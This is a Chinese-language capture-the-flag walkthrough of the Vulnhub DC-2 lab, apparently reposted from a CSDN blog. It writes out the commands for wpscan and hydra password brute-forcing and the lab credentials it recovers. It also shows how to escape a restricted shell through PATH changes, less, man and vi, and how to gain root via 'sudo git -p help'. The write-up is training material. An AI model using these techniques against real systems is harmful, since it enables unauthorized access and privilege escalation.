ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Vulnhub DC-2

2021-02-28 17:02:54  阅读:220  来源: 互联网

标签:bin git 登录 DC jerry dc Vulnhub 绕过


信息收集

arp扫内网
在这里插入图片描述
扫端口

nmap -A -p- -T4 192.168.1.139 -v

在这里插入图片描述
发现端口80和7744(ssh)

直接访问80端口会跳转,导致无法访问
kali修改hosts
在这里插入图片描述

漏洞利用

在这里插入图片描述
成功访问后到flag1

给了提示要用到cewl,cewl kali自带,用于爬行网站生成弱密码

cewl http://dc-2/ -w dc-2.txt

但是不知道用户名,先留着,
这里是wordpress框架,用wpscan(kali自带)爆出用户名

wpscan --url dc-2 -e u

在这里插入图片描述
爆出三个用户,在用cewl生成的字典进行密码爆破

wpscan --url http://dc-2 -P dc-2.txt -U admin

爆出来两个

tom/parturient jerry/adipiscing

dirb 扫目录

dirb http://dc-2

访问会直接跳转登录,拿上面账号登录
http://dc-2/wp-admin/user/

tom登录没东西
拿jerry登录

找到flag2
在这里插入图片描述
有个ssh,尝试爆破ssh

hydra -l tom -P dc-2.txt 192.168.1.139 ssh -s 7744 -V -t 5

在这里插入图片描述
jerry爆破失败

tom登录成功,不能用cat
在这里插入图片描述
命令执行绕过
最终发现只能用less
在这里插入图片描述

看到提示
在这里插入图片描述
发现有个su,用su登录jerry,这里也不知道为啥,jerry有密码但却不能爆破成功
其实做多了就知道flag在用户目录下
在这里插入图片描述
还是照着提示来,su不能用,要进行绕过

新东西

shell绕过限制

shell绕过限制学习
这里用修改环境变量的方法

export PATH=$PATH:/bin/   
export PATH=$PATH:/usr/bin

当然看到别的wp里还有别的手法,我个人没试出来

可使用less绕过:$less test    然后!'sh'
使用ls绕过:$man ls    然后!'sh'
使用vi绕过:$vi test    然后:!/bin/sh 或者 :!/bin/bash

即可绕过,然后flag4在jerry用户目录下
在这里插入图片描述

提权

提示提到了git,搜索git提权

切换jerry登录

sudo git help config
sudo git -p help
sudo git -p --help

成功提权
在这里插入图片描述

标签:bin,git,登录,DC,jerry,dc,Vulnhub,绕过
来源: https://blog.csdn.net/SopRomeo/article/details/114191793

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有